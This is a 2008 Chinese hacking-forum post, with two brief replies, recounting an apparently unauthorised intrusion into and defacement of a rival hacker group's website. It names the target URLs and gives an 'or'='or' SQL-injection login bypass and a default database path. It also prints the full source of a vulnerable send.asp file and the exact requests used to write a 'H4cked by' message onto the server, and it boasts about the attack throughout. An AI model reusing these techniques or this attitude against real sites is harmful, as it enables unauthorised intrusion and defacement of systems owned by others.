找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1161|回复: 2

入侵华东黑客联盟装X的过程

[复制链接]

485

主题

3564

回帖

70

牛毛

初生牛犊

积分
70
发表于 2008-10-19 14:59:23 | 显示全部楼层 来自 辽宁省营口市
他们的教程,我经常看,不错


只是有些关键地方不让你看,,难受

3

主题

96

回帖

141

牛毛

一级牛人

养养木马~

积分
141
发表于 2008-10-19 15:26:43 | 显示全部楼层 来自 江西省新余市
看不懂迷糊 学习下也不懂 [s:159]

38

主题

430

回帖

634

牛毛

一级牛人

  &nbsp

积分
634
QQ
 楼主| 发表于 2008-10-19 13:52:37 | 显示全部楼层 |阅读模式 来自 江苏省常州市
文章作者:落叶纷飞[J.L.S.T] & 云中鹰[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn


有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量

今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程

这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来

我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东

首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的

服务器应该防ARP,不过这还只是猜测

云中鸡说先不搞C段,PZ一下再说

然后我就打开了www.3hack.com

一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............

这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell

我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT

然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn

看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟

问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............

无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~

然后阿拉伯黑客发现了www.3hack.com上有个xia的目录很可疑,于是我就去看看是什么

打开一看,如图1所示。


我靠~~这啥东西?这么帅?点进去一看,如图2所示。

太帅了,真YD!!

这个页面应该是一套个人主页程序,而且还挺炫的!

这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。


嘿嘿,试着'or'='or'居然进去了!!如图4所示。


经过半个多小时的摸索,还是没有发现可利用的地方。

这下郁闷了,不管了,把这套程序下载下来看看吧

找了一会才知道这套程序叫做“V时代个人flash主页”

到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用

于是马上打开http://www.3hack.com/xia/html/admin

返回的确实找不到页面,郁闷了,输入http://www.3hack.com/xia/html/

同样是找不到页面,真晕!再看看!

5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!

马上打开http://www.3hack.com/xia/asp/vshidai.mdb,我晕!服务器居然设置了mdb后缀映射,下载不了!

打开http://www.3hack.com/xia/asp/,发现返回空白,这下我真是服了!

希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:

var a
var b
var tx
var clean
a=Request(\"re\")
clean=Request(\"clean\")
var jian=\"test.txt\"

if(clean==1){
tx=\"&a=\"
var fs2
var fs2=Server.CreateObject(\"Scripting.FileSystemObject\")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
newdt.WriteLine(\"&a=\")
newdt.close()
}

if(clean==0|clean==1){
tx=\"\"
var fso = Server.Createobject(\"Scripting.FileSystemObject\")
var file = fso.OpenTextFile(Server.Mappath(jian))
while (!file.AtEndOfStream){
tx=file.ReadLine()
Response.write (tx)
}
Response.write (\"&\")
file.close()
}

if(clean==2){
tx=\"\"
var fso = Server.Createobject(\"Scripting.FileSystemObject\")
var file = fso.OpenTextFile(Server.Mappath(jian))

var fs2
var fs2=Server.CreateObject(\"Scripting.FileSystemObject\")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)


while (!file.AtEndOfStream){
tx=file.ReadLine()
Response.write (tx)}

Response.write (a+\"&\")
newdt.WriteLine(a)

file.close()
newdt.close()
}



这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”

接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”

这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话

过程如图5、6所示。





提交后我们打开www.3hack.com/xia/test.txt看看,如图7所示。

这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的

如果jian是经过request取值的话,同样也能搞到shell。

这次只是装到了X,并没有拿到shell

已经是凌晨了,跟云中J说了声就睡觉去鸟

估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙

就到这里吧,没技术含量,纯粹装X,高手们见笑了

另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己

自己学不到技术,却还在自欺欺人

不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~




看了要回帖啊!!!!!!!!!!!!!!!!!
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-16 11:13 , Processed in 0.132363 second(s), 35 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表